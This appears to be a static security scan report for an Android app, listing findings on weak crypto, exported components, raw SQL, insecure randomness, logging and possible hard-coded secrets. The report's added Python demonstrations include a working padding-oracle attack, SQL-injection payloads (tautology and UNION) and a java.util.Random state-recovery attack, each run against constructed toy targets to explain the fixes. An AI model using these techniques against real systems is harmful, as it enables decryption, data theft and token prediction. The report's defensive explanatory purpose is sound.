Security baseline score
Security baseline score: 56/100
Overall risk grade: not recorded on this page (scale: A, B, C, F)
Privacy risk: 0 third-party trackers detected
Finding distribution (counts)
- High severity vulnerabilities: 2
- Medium severity vulnerabilities: 11
- Informational notes: 2
- Passed checks: 3
- Security hotspots: 0
High severity: The application uses the CBC cipher mode with PKCS5/PKCS7 padding. This configuration is vulnerable to padding-oracle attacks.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4
Files: V1/AbstractC0757a.java, line(s) 41
Note: CBC with PKCS7 padding becomes exploitable when the app decrypts data an attacker can influence and reveals, through a distinct exception, error message or timing difference, whether the padding was valid; a few thousand such queries recover the plaintext without the key. Confirm where the ciphertext handled at line 41 comes from, and prefer an authenticated mode (AES/GCM/NoPadding) or encrypt-then-MAC with the MAC verified before any unpadding is attempted. The same file is flagged for MD5 at line 32 in the MD5 finding below, so review the two together.
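To make the finding concrete, here is an added Python demonstration of a CBC/PKCS#7 padding-oracle attack; it is not code from the app or from the OWASP reference. A toy SHA-256-based Feistel block cipher stands in for AES so the example runs with the standard library only (the attack depends on the CBC structure, not on the cipher), the oracle models a decrypt routine that reveals only whether unpadding succeeded, and the key, IV and message are constructed here.

```python
import hashlib

BLOCK = 16
ROUNDS = 8

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 128-bit block cipher (balanced Feistel network keyed through SHA-256).
# It stands in for AES so no third-party package is needed; the attack below
# depends only on the CBC/PKCS#7 structure, not on which block cipher is used.
def _round(key, r, half):
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]

def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for r in range(ROUNDS):
        left, right = right, xor(left, _round(key, r, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for r in reversed(range(ROUNDS)):
        left, right = xor(right, _round(key, r, left)), left
    return left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the single bit of information the oracle leaks
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    padded, out, prev = pkcs7_pad(plaintext), b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out += xor(block_decrypt(key, cur), prev)
        prev = cur
    return pkcs7_unpad(out)

def make_padding_oracle(key):
    """Models a decrypt routine that tells the caller only whether unpadding succeeded."""
    def oracle(iv, ciphertext):
        try:
            cbc_decrypt(key, iv, ciphertext)
            return True
        except ValueError:
            return False
    return oracle

def padding_oracle_attack(oracle, iv, ciphertext):
    """Recover the plaintext of iv||ciphertext using only the oracle, never the key."""
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    recovered = b""
    for idx in range(1, len(blocks)):
        prev, target = blocks[idx - 1], blocks[idx]
        inter = bytearray(BLOCK)  # block_decrypt(key, target), learned one byte at a time
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            forged = bytearray(BLOCK)
            for k in range(pos + 1, BLOCK):  # bytes already known: force them to equal `pad`
                forged[k] = inter[k] ^ pad
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), target):
                    continue
                if pos == BLOCK - 1:
                    # A last-byte hit may be a chance 0x02 0x02 (etc.) instead of 0x01;
                    # flipping the byte before it breaks those cases but not a real 0x01.
                    forged[pos - 1] ^= 0xFF
                    still_valid = oracle(bytes(forged), target)
                    forged[pos - 1] ^= 0xFF
                    if not still_valid:
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise RuntimeError("oracle never accepted a guess")
        recovered += xor(bytes(inter), prev)
    return pkcs7_unpad(recovered)

def demo():
    # Constructed key, IV and message; the attacker side above never touches the key.
    key = hashlib.sha256(b"demo key, not a real secret").digest()
    iv = hashlib.sha256(b"demo iv").digest()[:BLOCK]
    message = b"session=7f3a;role=user;an 'invalid padding' error is enough to read this"
    ciphertext = cbc_encrypt(key, iv, message)
    recovered = padding_oracle_attack(make_padding_oracle(key), iv, ciphertext)
    return message, recovered
```

The attack needs at most 256 oracle queries per plaintext byte, which is why the fix is to remove the oracle entirely (authenticated encryption rejects tampered ciphertext before padding is ever examined) rather than to hide the exception message.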
High severity: If an application uses WebView.loadDataWithBaseURL to load a page into a WebView, it may be exposed to cross-site scripting.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#static-analysis-7
Files: com/nybnzdbqnih/ozvfwcjsbv/Uobxrpadwd.java, line(s) 330,7
Note: The call is dangerous only when untrusted data is concatenated into the HTML string and JavaScript is enabled on the WebView; the baseUrl argument also sets the origin the page runs under, so injected script inherits that origin's privileges (a file:// origin or the app's own web origin). Check what flows into the data argument at line 330, whether setJavaScriptEnabled(true) is applied to the same WebView, and whether any JavaScript interface is attached to it.
Medium severity: Activity (com.byd.maxlite.MainActivity) is not protected.
[android:exported=true] This Activity is shared with other applications on the device and can therefore be started by any of them.
Note: If this is the launcher Activity it has to be exported; the actionable question is whether it trusts extras, data URIs or results carried by the incoming Intent. The logging and clipboard findings below also reference com/lodhi/apps/boldtextgenerator/MainActivity.java, a second MainActivity under a different package root, so confirm which one the manifest actually exposes.
Medium severity: Broadcast Receiver (com.aofytsolviwsm.usorofsjzcx.Owasoauiwaktv) is not protected.
[android:exported=true] This Broadcast Receiver is shared with other applications on the device and can therefore be triggered by any of them.
Note: Any app can send it a crafted broadcast, so verify that it validates the action and never performs privileged work based on the Intent's extras. If it exists only to receive protected system broadcasts this is tolerable, because only the system can send those; otherwise restrict it with a signature-level permission or set exported=false.
Medium severity: Service (com.aofytsolviwsm.icvejujjoiaxle.Sqtlkonqwnlsh) is protected by a permission, but the permission's protection level should be checked.
Permission: android.permission.BIND_JOB_SERVICE [android:exported=true] This Service is shared with other applications on the device and can therefore be reached by any of them. It is protected by a permission that is not defined in the analysed application, so the protection level must be checked where the permission is defined. If it is normal or dangerous, a malicious application can request and obtain the permission and interact with the component; if it is signature, only applications signed with the same certificate can obtain it.
Note: android.permission.BIND_JOB_SERVICE is declared by the Android platform itself with protectionLevel signature, so only the system's JobScheduler can bind to the service. Declaring a JobService exported with exactly this permission is the required pattern, and this entry is a false positive unless the service also handles Intents by other routes.
Medium severity: Activity (com.byd.maxlite.FunIn) is not protected.
[android:exported=true] This Activity is shared with other applications on the device and can therefore be started by any of them.
Note: Unlike a launcher entry point, a secondary Activity rarely needs to be exported; if no other app is meant to start it, set android:exported="false", otherwise validate every Intent extra it consumes.
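An added Python check (not part of the report, the scanner or the app) that applies the exported-component logic of the four findings above to a manifest: exported components without a permission are flagged, a launcher Activity is downgraded to informational, and a protecting permission is resolved either in the manifest itself or in a small table of platform permissions. The manifest text is constructed from the component names in this report plus invented entries (SyncService, LegacyService, CloudService, Hidden and the two custom permissions) to exercise every outcome; the platform table lists only BIND_JOB_SERVICE, which AOSP declares with protectionLevel signature.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest modelled on this report's components; not the app's real manifest.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.byd.maxlite">
  <permission android:name="com.byd.maxlite.permission.INTERNAL" android:protectionLevel="signature"/>
  <permission android:name="com.byd.maxlite.permission.LEGACY"/>
  <application>
    <activity android:name="com.byd.maxlite.MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name="com.byd.maxlite.FunIn" android:exported="true"/>
    <receiver android:name="com.aofytsolviwsm.usorofsjzcx.Owasoauiwaktv" android:exported="true"/>
    <service android:name="com.aofytsolviwsm.icvejujjoiaxle.Sqtlkonqwnlsh"
             android:permission="android.permission.BIND_JOB_SERVICE" android:exported="true"/>
    <service android:name="com.byd.maxlite.SyncService"
             android:permission="com.byd.maxlite.permission.INTERNAL" android:exported="true"/>
    <service android:name="com.byd.maxlite.LegacyService"
             android:permission="com.byd.maxlite.permission.LEGACY" android:exported="true"/>
    <service android:name="com.byd.maxlite.CloudService"
             android:permission="com.example.partner.ACCESS" android:exported="true"/>
    <activity android:name="com.byd.maxlite.Hidden" android:exported="false"/>
  </application>
</manifest>
"""

# protectionLevel of platform permissions as declared in AOSP's framework manifest.
# Only the one this report mentions is listed (assumption: extend for other apps).
PLATFORM_PERMISSIONS = {"android.permission.BIND_JOB_SERVICE": "signature"}

COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

def android_attr(element, name, default=None):
    return element.get(f"{{{ANDROID_NS}}}{name}", default)

def audit_exported_components(manifest_xml):
    """Return (tag, name, severity, reason) for every component other apps can reach."""
    root = ET.fromstring(manifest_xml)
    declared = {android_attr(p, "name"): android_attr(p, "protectionLevel", "normal")
                for p in root.iter("permission")}
    findings = []
    for comp in root.find("application"):
        if comp.tag not in COMPONENT_TAGS:
            continue
        name = android_attr(comp, "name")
        has_filter = comp.find("intent-filter") is not None
        # Before Android 12 a missing android:exported defaults to true when an
        # intent-filter is present; Android 12+ refuses to install such a manifest.
        exported = android_attr(comp, "exported", "true" if has_filter else "false")
        if exported != "true":
            continue
        perm = android_attr(comp, "permission")
        is_launcher = any(android_attr(c, "name") == "android.intent.category.LAUNCHER"
                          for c in comp.iter("category"))
        if perm is None:
            if is_launcher:
                findings.append((comp.tag, name, "info",
                                 "launcher entry point, exported by necessity; review incoming Intent handling"))
            else:
                findings.append((comp.tag, name, "medium", "exported with no permission: any app can invoke it"))
            continue
        level = declared.get(perm, PLATFORM_PERMISSIONS.get(perm))
        if level is None:
            findings.append((comp.tag, name, "medium",
                             f"protected by {perm}, defined elsewhere: verify its protectionLevel"))
        elif level.startswith("signature"):
            findings.append((comp.tag, name, "info", f"protected by {perm} (protectionLevel={level})"))
        else:
            findings.append((comp.tag, name, "medium",
                             f"protected by {perm} with protectionLevel={level}: any app can request it"))
    return findings

def severity_by_component(manifest_xml=SAMPLE_MANIFEST):
    return {name: (sev, reason) for _, name, sev, reason in audit_exported_components(manifest_xml)}
```

Run against a real APK, feed it the manifest from apktool or aapt2 dump and extend PLATFORM_PERMISSIONS from the framework's AndroidManifest.xml for the target API level; the "defined elsewhere" branch is exactly the case the scanner reported for the JobService above.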
Medium severity: Files may contain hard-coded sensitive information such as usernames, passwords or keys.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#checking-memory-for-sensitive-data-mstg-storage-10
Files: A1/C0235B.java, line(s) 101 A1/C0242e.java, line(s) 39 A1/s.java, line(s) 90 Y0/h.java, line(s) 43
Note: This rule matches on identifier names (password, key, secret and the like) rather than on values, so open each flagged line and confirm whether a real credential is assigned there or only a field name or a placeholder.
Medium severity: SHA-1 is a weak hash with known collisions.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4
Files: P1/k.java, line(s) 255 l4/c.java, line(s) 67,69,72,75 m3/c.java, line(s) 61 n3/c.java, line(s) 284
Note: SHA-1 is acceptable as a checksum against accidental corruption or as a cache key, but not where an attacker benefits from producing a second input with the same digest (signatures, integrity checks, certificate pinning). l4/c.java is also listed under the insecure random number generator finding below, so check what those four calls feed.
Medium severity: The application uses a SQLite database and executes raw SQL queries. Untrusted user input in raw SQL queries can lead to SQL injection. Sensitive data should also be encrypted before it is written to the database.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04h-Testing-Code-Quality.md#injection-flaws-mstg-arch-2-and-mstg-platform-2
Files: F1/d.java, line(s) 8,68 F1/g.java, line(s) 13,53,67 F1/k.java, line(s) 4,37 F1/l.java, line(s) 6,134,184 F2/B1.java, line(s) 16,17,364,1977,2438,4295 F2/C0.java, line(s) 6,7,79 F2/C0052i.java, line(s) 5,6,82,137,178,1142,2056,2354 F2/H.java, line(s) 5,6,7,8,91 F2/L1.java, line(s) 5,235 F2/t1.java, line(s) 6,152 G1/k.java, line(s) 3,13,14,15,16,19,20,25,26,27,28,31,32,35 G1/l.java, line(s) 4,5,46 J0/h.java, line(s) 5,23,40,41,53,54 a3/c.java, line(s) 4,41 a3/m.java, line(s) 7,55 e1/b.java, line(s) 13,262 v0/b.java, line(s) 5,6,7,32
Note: Many of these lines are SQLiteDatabase import and declaration sites; the ones that matter are rawQuery() or execSQL() calls whose SQL string is built by concatenation from values that originate outside the app (Intent extras, content providers, network responses). Replace those with ? placeholders and selectionArgs, or with query(), and keep the string-built form only for SQL that contains no external data.
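As an added Python example (not the app's code), the difference between a rawQuery built by concatenation and one using bound parameters, run against a constructed in-memory SQLite database with invented rows. Two attacker-supplied owner names either dump every note or pull a token out of another table through the concatenated form, and are treated as a literal string by the parameterised form; the Android SQLiteDatabase API behaves the same way for rawQuery(sql) versus rawQuery(sql, selectionArgs).

```python
import sqlite3

def build_db():
    """In-memory SQLite database filled with constructed rows (not data from the app)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)")
    conn.execute("CREATE TABLE tokens (owner TEXT, token TEXT)")
    conn.executemany("INSERT INTO notes (owner, body) VALUES (?, ?)",
                     [("alice", "alice note"), ("bob", "bob note"), ("carol", "carol note")])
    conn.execute("INSERT INTO tokens VALUES ('alice', 'tok_alice_9f3c')")
    return conn

def notes_for_owner_raw(conn, owner):
    """Same shape as SQLiteDatabase.rawQuery() over a concatenated string: the value
    becomes part of the SQL text, so a quote inside it rewrites the statement."""
    sql = "SELECT body FROM notes WHERE owner = '" + owner + "'"
    return [row[0] for row in conn.execute(sql)]

def notes_for_owner_param(conn, owner):
    """Same shape as rawQuery(sql, selectionArgs) or query() with ? placeholders: the
    value is bound after parsing and can only ever be compared as a string."""
    return [row[0] for row in conn.execute("SELECT body FROM notes WHERE owner = ?", (owner,))]

# Constructed attacker-controlled inputs (e.g. arriving in an Intent extra).
TAUTOLOGY = "x' OR '1'='1"
UNION = "x' UNION SELECT token FROM tokens WHERE '1'='1"

def demo():
    conn = build_db()
    return {
        "raw_tautology": notes_for_owner_raw(conn, TAUTOLOGY),      # every note, all owners
        "raw_union": notes_for_owner_raw(conn, UNION),              # data from another table
        "param_tautology": notes_for_owner_param(conn, TAUTOLOGY),  # no owner has that name
        "param_union": notes_for_owner_param(conn, UNION),
        "param_legit": notes_for_owner_param(conn, "bob"),
    }
```

Binding also removes the temptation to escape quotes by hand; the second recommendation in the finding, encrypting sensitive columns at rest, is a separate control and is not addressed by parameterisation.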
Medium severity: The application uses an insecure random number generator.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#weak-random-number-generators
Files: F2/F1.java, line(s) 42 Q1/C0156p.java, line(s) 3 X4/C0778a.java, line(s) 3 a3/a.java, line(s) 16 l4/c.java, line(s) 13 p0/h.java, line(s) 122 w4/a.java, line(s) 3 w4/b.java, line(s) 3
Note: java.util.Random and Math.random() are linear congruential generators whose entire future can be computed from a couple of observed outputs. That is harmless for shuffling or UI jitter, but any flagged call that produces tokens, nonces, IVs, salts or keys must use java.security.SecureRandom. F2/F1.java and l4/c.java also appear under the MD5 and SHA-1 findings respectively, which makes them the first places to check.
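An added Python example, not from the app, showing why java.util.Random is unsuitable for security values. It re-implements the generator bit-for-bit from the algorithm specified in the java.util.Random Javadoc (48-bit LCG with multiplier 0x5DEECE66D, addend 0xB, seed scrambled by XOR with the multiplier), then recovers the generator's internal state from two observed nextInt() outputs by brute-forcing the 16 low bits that nextInt() discards, and predicts every value that follows. The seed and the "observed" outputs are constructed here.

```python
MULTIPLIER = 0x5DEECE66D
ADDEND = 0xB
MASK = (1 << 48) - 1

class JavaRandom:
    """Bit-exact re-implementation of java.util.Random's LCG (per the class Javadoc)."""

    def __init__(self, seed):
        self.state = (seed ^ MULTIPLIER) & MASK

    @classmethod
    def from_state(cls, state):
        obj = cls.__new__(cls)
        obj.state = state & MASK
        return obj

    def _next(self, bits):
        self.state = (self.state * MULTIPLIER + ADDEND) & MASK
        return self.state >> (48 - bits)

    def next_int(self):
        v = self._next(32)
        return v - (1 << 32) if v & (1 << 31) else v  # Java ints are signed 32-bit

def recover_state(out1, out2):
    """Given two consecutive nextInt() values, try the 65,536 possible low-order seed bits
    and return a generator positioned immediately after out2 (None if no candidate fits)."""
    hi = (out1 & 0xFFFFFFFF) << 16
    want = out2 & 0xFFFFFFFF
    for low in range(1 << 16):
        candidate = hi | low
        nxt = (candidate * MULTIPLIER + ADDEND) & MASK
        if nxt >> 16 == want:
            return JavaRandom.from_state(nxt)
    return None

def predicts_correctly(seed, count=5):
    """Victim generator vs. attacker clone built from two leaked outputs."""
    victim = JavaRandom(seed)
    observed = [victim.next_int(), victim.next_int()]  # two "tokens" the attacker saw
    clone = recover_state(*observed)
    if clone is None:
        return False
    return [clone.next_int() for _ in range(count)] == [victim.next_int() for _ in range(count)]

def demo(seed=0x5EED):
    # Constructed seed; new Random() seeded from the clock is no better, only harder to guess once.
    victim = JavaRandom(seed)
    observed = [victim.next_int(), victim.next_int()]
    clone = recover_state(*observed)
    predicted = [clone.next_int() for _ in range(3)]
    actual = [victim.next_int() for _ in range(3)]
    return predicted, actual
```

Outputs of nextInt(bound), nextLong() or nextDouble() leak fewer bits per call and need a few more samples, but fall to the same search; SecureRandom has no such recoverable state.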
Medium severity: MD5 is a weak hash with known collisions.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4
Files: F2/F1.java, line(s) 108 V1/AbstractC0757a.java, line(s) 32
Note: Collisions for MD5 can be produced in seconds, so it must not back signatures, integrity checks or password storage. V1/AbstractC0757a.java is the same file flagged for CBC/PKCS7 at line 41 above; if the digest at line 32 derives a key or IV for that cipher, fix both together with a proper KDF and an authenticated mode.
Medium severity: The application can read from and write to external storage, and any application can read data written to external storage.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#external-storage
Files: com/nybnzdbqnih/ozvfwcjsbv/Eqabmbolsgp.java, line(s) 77 com/nybnzdbqnih/ozvfwcjsbv/Pjnwyoaora.java, line(s) 120 com/nybnzdbqnih/ozvfwcjsbv/Uobxrpadwd.java, line(s) 306
Note: On Android 10 and later scoped storage narrows this, but anything written to shared directories remains readable by other apps, and files read back from external storage can have been replaced by another app. Keep private data in internal storage (or encrypt it), and treat anything read from external storage as untrusted input. Uobxrpadwd.java is also the file behind the WebView finding above.
Medium severity: This application may contain hard-coded secrets.
The following values were identified in the application; confirm that they are not secrets or private information:
- "pugpawxaapi" : "hstdhuzhxjfiepqfbidlierelr"
- 49f946663a8deb7054212b8adda248c6
- 357a2fa0-eb1a-4af3-9bf1-4ec71f8d20ab
- B3EEABB8EE11C2BE770B684D95219ECB
- c103703e120ae8cc73c9248622f3cd1e
Note: The three 32-character hex strings have the shape of MD5 digests and the fourth value is a UUID; such constants are often SDK identifiers or checksums rather than credentials. The first key/value pair looks most like an API credential and should be traced to where it is sent. Anything that turns out to be a real secret cannot be protected by obfuscation inside the APK and must move to a server-side exchange.
Informational: The application writes log messages; sensitive information must not be logged.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#logs
Files: A/f.java, line(s) 31,32 A1/C0237D.java, line(s) 68,115,67,105,114,106 A1/i.java, line(s) 521,146,184,520,298 A1/j.java, line(s) 138,139 A1/l.java, line(s) 22,43 A1/u.java, line(s) 90 C/C0001b.java, line(s) 54 C/RunnableC0000a.java, line(s) 209 C/d.java, line(s) 39,91,103,130 C0/AbstractC0280d.java, line(s) 22,21 D3/C0304d.java, line(s) 96,130 E/b.java, line(s) 54 E/d.java, line(s) 173,177 E/p.java, line(s) 50,74,78 E3/AbstractC0322a.java, line(s) 33 E4/r.java, line(s) 35,96,97 F/f.java, line(s) 40,45 F/g.java, line(s) 41 F/h.java, line(s) 58 F/i.java, line(s) 45 F/j.java, line(s) 57,115 F1/d.java, line(s) 99,98 F1/g.java, line(s) 116,172 F1/l.java, line(s) 303,373,374,487,488,304 F2/B1.java, line(s) 2217,2228,2216 F2/C0055j.java, line(s) 545,1228,441,467,544,569,599,635,677,725,779,850,915,1011,1105,1219,1342,1454,1580,236,261,282,316,352,366,374,382,392,402,421,447,534,538,540,789,1224 F2/I0.java, line(s) 54,48,163,51,66,70 F2/J1.java, line(s) 36,97,35,96 F2/M.java, line(s) 255 F2/Q0.java, line(s) 102,107,110 F2/T0.java, line(s) 51,70,50,69,38,67 F2/W.java, line(s) 113,144,156,165,114,157,145,166 G0/c.java, line(s) 54,77,84,110,136 G1/C0354b.java, line(s) 70,71 G3/C0365g.java, line(s) 232 H2/a.java, line(s) 114,119 I0/AbstractC0386a.java, line(s) 89,98,103,111,90,99,104,112 I0/g.java, line(s) 56,67,74,79,93,103,145,150,159,165,171,180,187 I0/o.java, line(s) 72,74,82,84,92,94,102,104 I2/a.java, line(s) 116,210,283,286,131,139,227 I3/AbstractC0397h.java, line(s) 234 I3/RunnableC0392c.java, line(s) 43 I3/k.java, line(s) 58,57,65 J0/C0418d.java, line(s) 32 J2/C0421b.java, line(s) 85,100,84,99,123 J2/C0423d.java, line(s) 46,45 J2/C0425f.java, line(s) 15,12 J2/C0430k.java, line(s) 48,55,47,54 J2/C0431l.java, line(s) 78,77 J2/HandlerC0424e.java, line(s) 61,119,60,103,113,57,83,125 J2/RunnableC0428i.java, line(s) 53,52 J2/ServiceConnectionC0429j.java, line(s) 55,54,68,93,124,145,154,69,94,125,146,155 K/MenuC0450k.java, line(s) 514 K/ViewOnKeyListenerC0444e.java, line(s) 441 K/a.java, line(s) 166 K/c.java, line(s) 90 K2/e.java, line(s) 57,96,103 K2/f.java, line(s) 93,33,106,153,161,177,193 K2/h.java, line(s) 37 K2/i.java, line(s) 445,447,336,382,386,442,85,104 K2/k.java, line(s) 30 K2/n.java, line(s) 59 K2/q.java, line(s) 100,104,55 K3/x.java, line(s) 254,263,298,304 L1/C0523b.java, line(s) 50,112,129,135,140,58,113,130,136,141 L1/j.java, line(s) 50,51 L3/d.java, line(s) 145,333 N/C0094b.java, line(s) 81 N/C0107m.java, line(s) 31,44,92,155,198,215,239 N/F.java, line(s) 75 N/S.java, line(s) 221,191,220 N/W.java, line(s) 20,31 N/l0.java, line(s) 31 N/m0.java, line(s) 32,44,51,60 N/q0.java, line(s) 77,93,68 N4/B.java, line(s) 66,45,87 O1/b.java, line(s) 97,143,244 O1/c.java, line(s) 48,64,74,84 O4/d.java, line(s) 227 P1/C0636g.java, line(s) 484,28,230,242 P1/k.java, line(s) 269,281,263 P4/d.java, line(s) 42 Q0/C0644c.java, line(s) 81,178 Q0/e.java, line(s) 32,45 Q0/f.java, line(s) 64 Q1/C0152n.java, line(s) 313 Q1/C0649d.java, line(s) 40,41 R2/AbstractC0658b.java, line(s) 184,50,183,177 R2/AbstractC0660d.java, line(s) 49,56 R3/B.java, line(s) 22,21 R3/D.java, line(s) 46,50,58,73,92,122,148,100,105,130,45,49,57,72,89,121,147 R3/e.java, line(s) 24,27 R3/h.java, line(s) 63,62 R3/k.java, line(s) 34,95,130,139,116,121,142,148,151,33,94,129 R3/n.java, line(s) 52,26,29,41,51,42 R3/s.java, line(s) 246,256,245,255 R3/t.java, line(s) 33,49 R3/u.java, line(s) 24 R3/x.java, line(s) 112,122,159,196,191,108,118,155,195 R3/y.java, line(s) 23,38,22,37 R3/z.java, line(s) 56,106,55,123,136,155,162 S0/f.java, line(s) 417,253,428,124,416,553,273,314,327,361,401,409,425 T/C0692c.java, line(s) 42,43 T/C0693d.java, line(s) 400 T/r.java, line(s) 18,17 T1/G.java, line(s) 12,20,22,31 U1/h.java, line(s) 24,32,34,43,50,58,60,69,76,84,86,131,96,104,106,115 V/d.java, line(s) 305 V/e.java, line(s) 1049,1083,1111,1140 W0/c.java, line(s) 85 X0/c.java, line(s) 56,79,53,78 X0/d.java, line(s) 132,149,154,131,148,153,173 X2/e.java, line(s) 134,159,175,183,392,218,219 Z0/b.java, line(s) 107,121,106,120 Z0/o.java, line(s) 456 Z3/d.java, line(s) 68 a0/C0231b.java, line(s) 128 a0/C0232c.java, line(s) 196,204,247,259,271,283,295,307,319,331,338,349,361,344 a0/g.java, line(s) 350,458,464,532,607,623,643,650,816,1022,1072,1092,1106,1140,1158,1218,1257,1260,1299,1320,1343,1352,1383,1398,1411,1419,1468,1494,1506,1523,1551,1635,1652,1667,1702,1793,58,367,518,984,1646,1723,1737 a3/C0257i.java, line(s) 35 b1/f.java, line(s) 67,135,68,136 b1/g.java, line(s) 97,201,217,229,93,109,115,144,150,157,184,196,203,216,228,77,113,148,165,185 com/lodhi/apps/boldtextgenerator/MainActivity.java, line(s) 243,242,145,327 d/f.java, line(s) 111 d1/b.java, line(s) 57,83,94 d1/d.java, line(s) 15,14 e1/C0310A.java, line(s) 97,96 e1/C0316b.java, line(s) 68,87,92,108,113,69,88,95,119 e1/C0318d.java, line(s) 55,54 e1/C0319e.java, line(s) 260,332,369,330,368 e1/b.java, line(s) 58,315,57,311 g/AbstractC0350k.java, line(s) 614,387,396 g/LayoutInflaterFactory2C0333B.java, line(s) 1097,1749,1751,1754,957,966,976,985,992,1004,1013,697,777,780,1240,1253,1593 g/c.java, line(s) 30,33,36,84,165,176 g/q.java, line(s) 42 g/s.java, line(s) 186,194 h1/C0377b.java, line(s) 56,55,65,91,92 h1/C0378c.java, line(s) 43,44 h1/D.java, line(s) 99,120,150,98,119,149 h1/i.java, line(s) 22,27,23,30 h1/m.java, line(s) 24,31,126,136,150,161,184,192,216,242,248,23,30,125,135,147,160,183,191,211,222,232,237,241,244 h1/p.java, line(s) 94,440,727,93,390,439,465,534,639,656,677,698,710,726,748,760,422,481,562 h1/r.java, line(s) 28,58,33,63 h1/v.java, line(s) 72,78,84,90,96,103,109,124,136,73,79,85,91,97,104,110,137,125 h1/y.java, line(s) 43,52,59,44,53,60,61,62,65 h4/b.java, line(s) 518 j/C0408h.java, line(s) 92,142,154,164 j/C0409i.java, line(s) 164 j/m.java, line(s) 22 l/AbstractC0472d0.java, line(s) 20 l/C0480h0.java, line(s) 87,96,189 l/C0491n.java, line(s) 102,147,145,157,158 l/C0506v.java, line(s) 62 l/C0510x.java, line(s) 191 l/D0.java, line(s) 226,80,85,209 l/I0.java, line(s) 23 l/L.java, line(s) 60,65,70,75 l/P0.java, line(s) 34 l/S.java, line(s) 74 l/d1.java, line(s) 112 l2/b.java, line(s) 35 m2/l.java, line(s) 295 m3/c.java, line(s) 54,65 n0/d.java, line(s) 762,770 n2/AbstractC0562e.java, line(s) 317,207,213,219,228,345 n2/BinderC0557C.java, line(s) 39 n2/C0564g.java, line(s) 77 n2/E.java, line(s) 45 n2/H.java, line(s) 40,45 n2/HandlerC0556B.java, line(s) 106,114 n2/J.java, line(s) 47 n2/o.java, line(s) 82,85,114,117,120,158,163 n2/r.java, line(s) 16 n3/c.java, line(s) 274,295,92,93,233,255 n3/g.java, line(s) 54,53 n3/i.java, line(s) 111,45,110,46 o3/l.java, line(s) 43,42 p0/AbstractC0603G.java, line(s) 759 p0/C0624u.java, line(s) 138,108 p0/Q.java, line(s) 47 p0/RunnableC0607c.java, line(s) 42,48 p0/W.java, line(s) 174 p0/h.java, line(s) 689,699,690,700 q2/C0651b.java, line(s) 74,93 q2/e.java, line(s) 116,104,133 t2/AbstractC0714b.java, line(s) 178 t3/c.java, line(s) 746,739,745,131,137,143,564,577,618,637 u3/b.java, line(s) 304 u3/d.java, line(s) 21 u3/f.java, line(s) 420,438,82,91,121,161,193,228,260,292,349 v0/c.java, line(s) 27 v0/d.java, line(s) 169 v2/d.java, line(s) 76,82,526,109,119,141,177,219,521,165,79,168,192,195,214,271,331,367,381,389,398,492 v2/e.java, line(s) 355,379 v4/a.java, line(s) 330 y/c.java, line(s) 65,104,113 y/g.java, line(s) 51 y/j.java, line(s) 369,438 y/n.java, line(s) 724,1296,1785,1791,1792,1793,1800,1830,1842,1891,342,864,1391,1403,1716
Note: Most of these sites are in library packages, so the practical check is to grep the app's own packages for Log calls that print tokens, credentials, request bodies or personal data, and to strip Log calls from release builds (for example with a ProGuard/R8 assumenosideeffects rule). Logcat output is visible to anyone with adb access to the device and ends up in bug reports.
Informational: This application copies data to the clipboard. Sensitive data should not be copied to the clipboard, because other applications can read it.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04b-Mobile-App-Security-Testing.md#clipboard
Files: com/lodhi/apps/boldtextgenerator/d.java, line(s) 4,33,44
Note: Android 10 and later restrict background clipboard reads, but the foreground app and the default input method can still read it, and copied text persists until overwritten. For a text-formatting feature this is expected behaviour; it only matters if the copied content can include credentials or personal data.
Passed: This application uses SSL pinning to detect or prevent MITM attacks on its secure communication channels.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4
Files: O4/e.java, line(s) 52,51,50 O4/h.java, line(s) 85,75,84,94,83,83 O4/m.java, line(s) 52,51,50,50 O4/n.java, line(s) 101,89,100,99,99
